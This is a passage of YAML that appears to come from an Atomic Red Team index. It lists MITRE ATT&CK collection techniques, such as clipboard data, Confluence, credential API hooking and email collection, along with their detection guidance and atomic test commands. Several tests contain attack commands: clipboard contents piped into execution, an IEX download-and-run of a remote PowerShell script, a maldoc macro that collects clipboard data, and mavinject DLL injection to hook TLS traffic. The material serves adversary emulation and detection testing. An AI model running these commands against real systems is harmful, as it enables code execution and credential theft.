kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-04-23T18:35:58.230Z' + created: '2017-05-31T21:31:25.967Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - Windows + - macOS + x_mitre_detection: Access to the clipboard is a legitimate function of many + applications on an operating system. If an organization chooses to monitor + for this behavior, then the data will likely need to be correlated against + other suspicious or non-user-driven activity. + x_mitre_data_sources: + - API monitoring + x_mitre_version: '1.1' + identifier: T1115 + atomic_tests: + - name: Utilize Clipboard to store or execute commands from + auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 + description: 'Add data to clipboard to copy off or execute commands from. + +' + supported_platforms: + - windows + executor: + command: | + dir | clip + echo "T1115" > %temp%\T1115.txt + clip < %temp%\T1115.txt + cleanup_command: 'del %temp%\T1115.txt >nul 2>&1 + +' + name: command_prompt + - name: Execute Commands from Clipboard using PowerShell + auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416 + description: 'Utilize PowerShell to echo a command to clipboard and execute + it + +' + supported_platforms: + - windows + executor: + command: | + echo Get-Process | clip + Get-Clipboard | iex + name: powershell + - name: Execute commands from clipboard + auto_generated_guid: 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff + description: Echo a command to clipboard and execute it + supported_platforms: + - macos + executor: + command: |- + echo ifconfig | pbcopy + $(pbpaste) + name: bash + - name: Collect Clipboard Data via VBA + auto_generated_guid: 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 + description: 'This module copies the data stored in the user''s clipboard and + writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt + +' + supported_platforms: + - windows + input_arguments: + ms_product: + description: Maldoc application Word + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: 'Microsoft #{ms_product} must be installed + +' + prereq_command: | + try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} + manually to meet this requirement" + +' + executor: + command: | + Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA" + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard" + cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" + -ErrorAction Ignore + +' + name: powershell + T1213.001: + technique: + external_references: + - source_name: mitre-attack + external_id: T1213.001 + url: https://attack.mitre.org/techniques/T1213/001 + - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html + description: Atlassian. (2018, January 9). How to Enable User Access Logging. + Retrieved April 4, 2018. + source_name: Atlassian Confluence Logging + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Confluence + description: |2 + + Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation, however, in general may contain more diverse categories of useful information, such as: + + * Policies, procedures, and standards + * Physical / logical network diagrams + * System architecture diagrams + * Technical system documentation + * Testing / development credentials + * Work / project schedules + * Source code snippets + * Links to network shares and other internal resources + id: attack-pattern--7ad38ef1-381a-406d-872a-38b136eb5ecc + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-03-24T16:42:09.222Z' + created: '2020-02-14T13:09:51.004Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + x_mitre_detection: |- + Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. + + User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities. + x_mitre_data_sources: + - Third-party application logs + - Authentication logs + x_mitre_platforms: + - SaaS + atomic_tests: [] + T1056.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1056.004 + url: https://attack.mitre.org/techniques/T1056/004 + - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017 + description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I. + Retrieved December 18, 2017. + url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918 + - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx + description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017. + source_name: Microsoft Hook Overview + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. + Retrieved December 7, 2017.' + source_name: Endgame Process Injection July 2017 + - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/ + description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks. + Retrieved December 12, 2017.' + source_name: Adlice Software IAT Hooks Oct 2014 + - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/ + description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User + Mode. Retrieved December 20, 2017.' + source_name: MWRInfoSecurity Dynamic Hooking 2015 + - url: https://www.exploit-db.com/docs/17802.pdf + description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved + December 12, 2017. + source_name: HighTech Bridge Inline Hooking Sept 2011 + - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html + description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware + Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017. + source_name: Volatility Detecting Hooks Sept 2012 + - url: https://github.com/prekageo/winhook + description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017. + source_name: PreKageo Winhook Jul 2011 + - url: https://github.com/jay/gethooks + description: Satiro, J. (2011, September 14). GetHooks. Retrieved December + 12, 2017. + source_name: Jay GetHooks Sept 2011 + - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/ + description: Felici, M. (2006, December 6). Any application-defined hook procedure + on my machine?. Retrieved December 12, 2017. + source_name: Zairon Hooking Dec 2006 + - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/ + description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense + against user-land. Retrieved December 12, 2017.' + source_name: EyeofRa Detecting Hooking June 2017 + - url: http://www.gmer.net/ + description: GMER. (n.d.). GMER. Retrieved December 12, 2017. + source_name: GMER Rootkits + - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx + description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved + December 12, 2017. + source_name: Microsoft Process Snapshot + - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis + description: Stack Exchange - Security. (2012, July 31). What are the methods + to find hooked functions and APIs?. Retrieved December 12, 2017. + source_name: StackExchange Hooks Jul 2012 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Credential API Hooking + description: | + Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via: + + * **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Endgame Process Injection July 2017) + * **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Endgame Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015) + * **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow.(Citation: Endgame Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015) + id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + - kill_chain_name: mitre-attack + phase_name: credential-access + modified: '2020-03-24T21:29:13.565Z' + created: '2020-02-11T19:01:15.930Z' + x_mitre_data_sources: + - Windows event logs + - Process monitoring + - Loaded DLLs + - DLL monitoring + - Binary file metadata + - API monitoring + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: |- + Monitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017) + + Rootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity. + + Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014) + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Windows + identifier: T1056.004 + atomic_tests: + - name: Hook PowerShell TLS Encrypt/Decrypt Messages + auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 + description: 'Hooks functions in PowerShell to read TLS Communications + +' + supported_platforms: + - windows + input_arguments: + file_name: + description: Dll To Inject + type: Path + default: PathToAtomicsFolder\T1056.004\bin\T1056.004x64.dll + server_name: + description: TLS Server To Test Get Request + type: Url + default: https://www.example.com + dependency_executor_name: powershell + dependencies: + - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) + +' + prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" + executor: + command: | + mavinject $pid /INJECTRUNNING #{file_name} + curl #{server_name} + name: powershell + elevation_required: true + T1074: + technique: + id: attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Data Staged + description: |- + Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017) + + In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020) + + Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection. + external_references: + - source_name: mitre-attack + external_id: T1074 + url: https://attack.mitre.org/techniques/T1074 + - source_name: PWC Cloud Hopper April 2017 + description: PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved + April 5, 2017. + url: https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf + - source_name: Mandiant M-Trends 2020 + url: https://content.fireeye.com/m-trends/rpt-m-trends-2020 + description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, + 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-09-14T19:48:08.180Z' + created: '2017-05-31T21:30:58.938Z' + x_mitre_is_subtechnique: false + x_mitre_contributors: + - Praetorian + - Shane Tully, @securitygypsy + x_mitre_platforms: + - Linux + - macOS + - Windows + - AWS + - GCP + - Azure + x_mitre_detection: |- + Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. + + Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + x_mitre_data_sources: + - File monitoring + - Process monitoring + - Process command-line parameters + x_mitre_version: '1.2' + atomic_tests: [] + T1530: + technique: + id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7 + description: |- + Adversaries may access data objects from improperly secured cloud storage. + + Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) + + Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls. + name: Data from Cloud Storage Object + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - external_id: T1530 + source_name: mitre-attack + url: https://attack.mitre.org/techniques/T1530 + - source_name: Amazon S3 Security, 2019 + url: https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/ + description: Amazon. (2019, May 17). How can I secure the files in my Amazon + S3 bucket?. Retrieved October 4, 2019. + - source_name: Microsoft Azure Storage Security, 2019 + url: https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide + description: Amlekar, M., Brooks, C., Claman, L., et. al.. (2019, March 20). + Azure Storage security guide. Retrieved October 4, 2019. + - source_name: Google Cloud Storage Best Practices, 2019 + url: https://cloud.google.com/storage/docs/best-practices + description: Google. (2019, September 16). Best practices for Cloud Storage. + Retrieved October 4, 2019. + - source_name: Trend Micro S3 Exposed PII, 2017 + url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia + description: Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed + Almost 50 Thousand PII in Australia. Retrieved October 4, 2019. + - source_name: Wired Magecart S3 Buckets, 2019 + url: https://www.wired.com/story/magecart-amazon-cloud-hacks/ + description: 'Barrett, B.. (2019, July 11). Hack Brief: A Card-Skimming Hacker + Group Hit 17K Domains—and Counting. Retrieved October 4, 2019.' + - source_name: HIPAA Journal S3 Breach, 2017 + url: https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/ + description: HIPAA Journal. (2017, October 11). 47GB of Medical Records and + Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-07-09T14:02:05.276Z' + created: '2019-08-30T18:07:27.741Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - AWS + - GCP + - Azure + x_mitre_version: '1.0' + x_mitre_contributors: + - Netskope + - Praetorian + x_mitre_detection: Monitor for unusual queries to the cloud provider's storage + service. Activity originating from unexpected sources may indicate improper + permissions are set that is allowing access to data. Additionally, detecting + failed attempts by a user for a certain object, followed by escalation of + privileges by the same user, and access to the same object may be an indication + of suspicious activity. + x_mitre_data_sources: + - Stackdriver logs + - Azure activity logs + - AWS CloudTrail logs + x_mitre_permissions_required: + - User + atomic_tests: [] + T1602: + technique: + external_references: + - source_name: mitre-attack + external_id: T1602 + url: https://attack.mitre.org/techniques/T1602 + - source_name: US-CERT-TA18-106A + url: https://www.us-cert.gov/ncas/alerts/TA18-106A + description: US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored + Cyber Actors Targeting Network Infrastructure Devices. Retrieved October + 19, 2020. + - source_name: US-CERT TA17-156A SNMP Abuse 2017 + url: https://us-cert.cisa.gov/ncas/alerts/TA17-156A + description: US-CERT. (2017, June 5). Reducing the Risk of SNMP Abuse. Retrieved + October 19, 2020. + - source_name: Cisco Advisory SNMP v3 Authentication Vulnerabilities + url: https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3 + description: Cisco. (2008, June 10). Identifying and Mitigating Exploitation + of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October + 19, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Data from Configuration Repository + description: |- + Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices. + + Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017) + id: attack-pattern--0ad7bc5c-235a-4048-944b-3b286676cb74 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-10-22T02:26:44.566Z' + created: '2020-10-19T23:46:13.931Z' + x_mitre_data_sources: + - Netflow/Enclave netflow + - Network protocol analysis + - Packet capture + x_mitre_version: '1.0' + x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - Administrator + x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts + or networks that solicits and obtains the configuration information of the + queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)' + x_mitre_platforms: + - Network + atomic_tests: [] + T1213: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1213 + url: https://attack.mitre.org/techniques/T1213 + - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2 + description: Microsoft. (2017, July 19). Configure audit settings for a site + collection. Retrieved April 4, 2018. + source_name: Microsoft SharePoint Logging + - url: https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html + description: Atlassian. (2018, January 9). How to Enable User Access Logging. + Retrieved April 4, 2018. + source_name: Atlassian Confluence Logging + description: |- + Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information. + + The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository: + + * Policies, procedures, and standards + * Physical / logical network diagrams + * System architecture diagrams + * Technical system documentation + * Testing / development credentials + * Work / project schedules + * Source code snippets + * Links to network shares and other internal resources + + Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include [Sharepoint](https://attack.mitre.org/techniques/T1213/002), [Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such as SQL Server. + name: Data from Information Repositories + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--d28ef391-8ed4-45dc-bc4a-2f43abf54416 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-10-12T12:16:55.085Z' + created: '2018-04-18T17:59:24.739Z' + x_mitre_is_subtechnique: false + x_mitre_version: '3.0' + x_mitre_contributors: + - Praetorian + - Milos Stojadinovic + x_mitre_data_sources: + - OAuth audit logs + - Application logs + - Authentication logs + - Data loss prevention + - Third-party application logs + x_mitre_detection: |- + As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. + + The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities. + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Linux + - Windows + - macOS + - SaaS + - Office 365 + atomic_tests: [] + T1005: + technique: + created: '2017-05-31T21:30:20.537Z' + modified: '2020-05-26T19:21:25.974Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + url: https://attack.mitre.org/techniques/T1005 + external_id: T1005 + description: | + Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration. + + Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. + name: Data from Local System + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5 + x_mitre_version: '1.2' + x_mitre_data_sources: + - File monitoring + - Process monitoring + - Process command-line parameters + x_mitre_detection: Monitor processes and command-line arguments for actions + that could be taken to collect files from a system. Remote access tools with + built-in features may interact directly with the Windows API to gather data. + Data may also be acquired through Windows system management tools such as + [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) + and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + x_mitre_system_requirements: + - Privileges to access certain files and directories + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_is_subtechnique: false + atomic_tests: [] + T1039: + technique: + id: attack-pattern--ae676644-d2d2-41b7-af7e-9bed1b55898c + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Data from Network Shared Drive + description: Adversaries may search network shares on computers they have compromised + to find files of interest. Sensitive data can be collected from remote systems + via shared network drives (host shared directory, network file server, etc.) + that are accessible from the current system prior to Exfiltration. Interactive + command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) + may be used to gather information. + external_references: + - source_name: mitre-attack + external_id: T1039 + url: https://attack.mitre.org/techniques/T1039 + - external_id: CAPEC-639 + source_name: capec + url: https://capec.mitre.org/data/definitions/639.html + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-03-24T15:42:44.026Z' + created: '2017-05-31T21:30:41.022Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_system_requirements: + - Privileges to access network shared drive + x_mitre_detection: Monitor processes and command-line arguments for actions + that could be taken to collect files from a network share. Remote access tools + with built-in features may interact directly with the Windows API to gather + data. Data may also be acquired through Windows system management tools such + as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) + and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + x_mitre_data_sources: + - File monitoring + - Process monitoring + - Process command-line parameters + x_mitre_version: '1.2' + atomic_tests: [] + T1025: + technique: + id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Data from Removable Media + description: "Adversaries may search connected removable media on computers + they have compromised to find files of interest. Sensitive data can be collected + from any removable media (optical disk drive, USB memory, etc.) connected + to the compromised system prior to Exfiltration. Interactive command shells + may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) + may be used to gather information. \n\nSome adversaries may also use [Automated + Collection](https://attack.mitre.org/techniques/T1119) on removable media." + external_references: + - source_name: mitre-attack + url: https://attack.mitre.org/techniques/T1025 + external_id: T1025 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-03-24T15:44:46.584Z' + created: '2017-05-31T21:30:31.584Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_system_requirements: + - Privileges to access removable media drive and files + x_mitre_detection: Monitor processes and command-line arguments for actions + that could be taken to collect files from a system's connected removable media. + Remote access tools with built-in features may interact directly with the + Windows API to gather data. Data may also be acquired through Windows system + management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) + and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + x_mitre_data_sources: + - File monitoring + - Process monitoring + - Process command-line parameters + x_mitre_version: '1.1' + atomic_tests: [] + T1114: + technique: + id: attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Email Collection + description: 'Adversaries may target user email to collect sensitive information. + Emails may contain sensitive data, including trade secrets or personal information, + that can prove valuable to adversaries. Adversaries can collect or forward + email from mail servers or clients. ' + external_references: + - source_name: mitre-attack + external_id: T1114 + url: https://attack.mitre.org/techniques/T1114 + - description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding. + Retrieved October 8, 2019. + url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/ + source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: collection + modified: '2020-03-24T18:31:06.417Z' + created: '2017-05-31T21:31:25.454Z' + x_mitre_contributors: + - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC) + x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Windows + - Office 365 + x_mitre_detection: |- + There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection. + + File access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity. + + Monitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). + + Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. + + Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level. + x_mitre_data_sources: + - Office 365 trace logs + - Mail server + - Email gateway + - Authentication logs + - File monitoring + - Process monitoring + - Process use of network + x_mitre_version: '2.1' + atomic_tests: [] + T1114.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1114.003 + url: https://attack.mitre.org/techniques/T1114/003 + - source_name: US-CERT TA18-068A 2018 + url: https://www.us-cert.gov/ncas/alerts/TA18-086A + description: US-CERT. (2018, March 27). TA18-068A Brute Force Attacks Conducted + by Cyber Actors. Retrieved October 2, 2019. + - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2 + url: 